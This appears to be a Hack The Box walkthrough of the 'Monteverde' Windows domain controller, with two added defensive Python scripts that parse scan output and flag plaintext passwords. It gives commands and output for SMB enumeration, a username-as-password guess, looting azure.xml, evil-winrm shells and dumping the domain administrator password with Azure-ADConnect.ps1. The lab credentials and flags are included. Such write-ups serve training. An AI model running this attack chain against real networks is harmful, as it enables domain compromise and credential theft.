Basic Scan

Nmap Scan

~/Documents/HTB/Monteverde root@kali
❯ cat nmap.txt
# Nmap 7.80 scan initiated Mon Jan 27 10:08:26 2020 as: nmap -p- -sC -sV -oN nmap.txt 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.30s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-27 02:28:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49771/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/27%Time=5E2E483C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m53s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-27T02:30:52
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 27 10:22:35 2020 -- 1 IP address (1 host up) scanned in 849.28 seconds

Port 80 is not open, so the next step is SMB enumeration.
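A scan like the one above is usually read by eye, but the same facts (which listeners are up, whether the host is a domain controller, whether SMB signing is enforced, which remote-management ports are reachable) can be pulled out programmatically for an inventory or exposure check. The following Python script is an added example, not part of the original writeup; it parses the port lines and host-script results of nmap's normal (-oN) output format, and the sample text it embeds is constructed to mirror the Monteverde scan rather than being the file from the page. The port-to-role tables (DC_PORTS, MGMT_PORTS) are the example's own assumptions.

```python
import re

# Constructed sample in the shape of nmap's normal (-oN) output; it mirrors
# the Monteverde scan above but is not the original nmap.txt.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-27 02:28:22Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
"""

# One nmap port line: "<port>/<proto> <state> <service> [<version ...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
DOMAIN_FIELD = re.compile(r"Domain:\s*([A-Za-z0-9.-]+)")

# Ports that together identify an Active Directory domain controller
# (assumed mapping for this example).
DC_PORTS = {88: "kerberos", 389: "ldap", 636: "ldaps",
            3268: "global-catalog", 3269: "global-catalog-tls"}
# Remote-management listeners a defender normally restricts to admin networks.
MGMT_PORTS = {5985: "winrm-http", 5986: "winrm-https", 3389: "rdp"}


def parse_ports(text):
    """Return {port: (proto, state, service, version)} for every port line."""
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            ports[int(port)] = (proto, state, service, version or "")
    return ports


def extract_domain(text):
    """Pull the AD domain from the LDAP banner. The trailing '0.' seen in the
    scan above (MEGABANK.LOCAL0.) is a rendering artifact, so strip it."""
    m = DOMAIN_FIELD.search(text)
    if not m:
        return None
    return re.sub(r"0\.$", "", m.group(1))


def summarize(text):
    """Condense a scan into the facts an exposure review cares about."""
    ports = parse_ports(text)
    open_ports = sorted(p for p, (_, state, _, _) in ports.items() if state == "open")
    return {
        "open_ports": open_ports,
        "domain": extract_domain(text),
        # Kerberos plus LDAP or the Global Catalog is the DC signature.
        "likely_domain_controller": 88 in open_ports
        and any(p in open_ports for p in (389, 3268)),
        "dc_services": {p: DC_PORTS[p] for p in open_ports if p in DC_PORTS},
        "management_exposed": {p: MGMT_PORTS[p] for p in open_ports if p in MGMT_PORTS},
        # From the smb2-security-mode host script, as printed above.
        "smb_signing_required": "Message signing enabled and required" in text,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_SCAN).items():
        print(f"{key}: {value}")
```

On the Monteverde output this reports a domain controller for MEGABANK.LOCAL with SMB signing required and WinRM (5985) reachable from the scanning host, which is exactly the path the rest of the writeup takes.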

SMB Enumeration

~/Documents/HTB/Monteverde root@kali
❯ cat enum4linux.txt
...
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]


[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]

[+] Getting domain group memberships:
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Enterprise Read-only Domain Controllers' (RID: 498) has member: Could not initialise pipe samr. Error was NT_STATUS_INVALID_NETWORK_RESPONSE
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
...

This yields the users and groups. Using the usernames as the wordlist for an SMB password brute-force, the user SABatchJobs turns out to have a password identical to its username. Listing the SMB shares reveals the users$ share.

~/Documents/HTB/Monteverde root@kali
❯ smbclient -L 10.10.10.172 -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
azure_uploads Disk
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
users$ Disk
SMB1 disabled -- no workgroup available

After logging in, the mhope directory contains a file, azure.xml, that holds the mhope user's credentials.

~/Documents/HTB/Monteverde root@kali
❯ smbclient \\\\10.10.10.172\\users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jan 3 21:12:48 2020
.. D 0 Fri Jan 3 21:12:48 2020
dgalanos D 0 Fri Jan 3 21:12:30 2020
mhope D 0 Fri Jan 3 21:41:18 2020
roleary D 0 Fri Jan 3 21:10:30 2020
smorgan D 0 Fri Jan 3 21:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
. D 0 Fri Jan 3 21:41:18 2020
.. D 0 Fri Jan 3 21:41:18 2020
azure.xml AR 1212 Fri Jan 3 21:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\>
~/Documents/HTB/Monteverde root@kali
❯ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
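The azure.xml above is PowerShell CLIXML, the format Export-Clixml writes. The security-relevant detail is the element type: a `<S>` property is a plain string readable by anyone who can read the file, while a `<SS>` property is a SecureString, which Export-Clixml on Windows protects with DPAPI for the exporting user and machine. The script below is an added example, not part of the original writeup, that a defender could run over files found on shares to flag credential-like properties and say whether they are plaintext. The embedded sample is constructed with the same object shape as azure.xml (placeholder values, plus a second PSCredential-style object to show the SecureString case); the list of property names treated as sensitive is the example's own assumption.

```python
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
NS = {"ps": PS_NS}

# Property names worth flagging when they appear in an exported object
# (assumed list for this example).
SENSITIVE_NAMES = ("password", "secret", "token", "connectionstring")

# Constructed sample: same shape as the azure.xml found on the share above,
# plus a second object showing the SecureString (<SS>) form. All values are
# placeholders, not the page's credentials.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">PLACEHOLDER-PLAINTEXT</S>
</Props>
</Obj>
<Obj RefId="1">
<TN RefId="1">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<Props>
<S N="UserName">example-user</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb</SS>
</Props>
</Obj>
</Objs>"""


def find_credential_properties(xml_text):
    """Walk every serialized object and report properties whose name suggests a
    credential. Tag "S" is a plain string; "SS" is a DPAPI-protected SecureString."""
    root = ET.fromstring(xml_text)
    findings = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        type_names = [t.text for t in obj.findall("ps:TN/ps:T", NS)]
        props = obj.find("ps:Props", NS)
        if props is None:
            continue
        for prop in props:
            name = prop.get("N", "")
            if not any(s in name.lower() for s in SENSITIVE_NAMES):
                continue
            tag = prop.tag.split("}", 1)[1]  # strip the namespace
            findings.append({
                "object_type": type_names[0] if type_names else "unknown",
                "property": name,
                "encoding": tag,
                "plaintext": tag == "S",
            })
    return findings


def report(xml_text):
    """Human-readable lines; deliberately never echoes the values themselves."""
    lines = []
    for f in find_credential_properties(xml_text):
        risk = "PLAINTEXT" if f["plaintext"] else "protected"
        lines.append(f"[{risk}] {f['object_type']}.{f['property']} ({f['encoding']})")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_CLIXML)))
```

The PSADPasswordCredential object in azure.xml stores its Password as `<S>`, so the finding is PLAINTEXT regardless of who exported it; a PSCredential exported the same way would come out as `<SS>` and be useless off the original machine and account.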

User.txt

Log in with evil-winrm to obtain user.txt.

~/Documents/HTB/Monteverde root@kali
❯ evil-winrm -i 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
*Evil-WinRM* PS C:\Users\mhope\Desktop>

root.txt

Combining this with the earlier SMB results, the user mhope is a member of the Azure Admins group. See https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/ for a description of Azure Admins:

During both my DEF CON and Troopers talks I mentioned a vulnerability that existed in Azure AD where an Application Admin or a compromised On-Premise Sync Account could escalate privileges by assigning credentials to applications

Use Azure-ADConnect.ps1 to retrieve the administrator's credentials:

*Evil-WinRM* PS C:\Users\mhope\Downloads> upload Azure-ADConnect.ps1 C:\Users\mhope\Downloads\Azure-ADConnect.ps1
Info: Uploading Azure-ADConnect.ps1 to C:\Users\mhope\Downloads\Azure-ADConnect.ps1

Data: 3016 bytes of 3016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Downloads> dir


Directory: C:\Users\mhope\Downloads


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/28/2020 8:52 PM 2264 Azure-ADConnect.ps1


*Evil-WinRM* PS C:\Users\mhope\Downloads> . ./Azure-ADConnect.ps1
*Evil-WinRM* PS C:\Users\mhope\Downloads> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!

Logging in with these credentials yields root.txt.

~/Documents/HTB/Monteverde root@kali
❯ evil-winrm -i 10.10.10.172 -u administrator -p d0m@in4dminyeah!

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
12909612d25c8dcf6e5a07d1a804a0bc
*Evil-WinRM* PS C:\Users\Administrator\Desktop>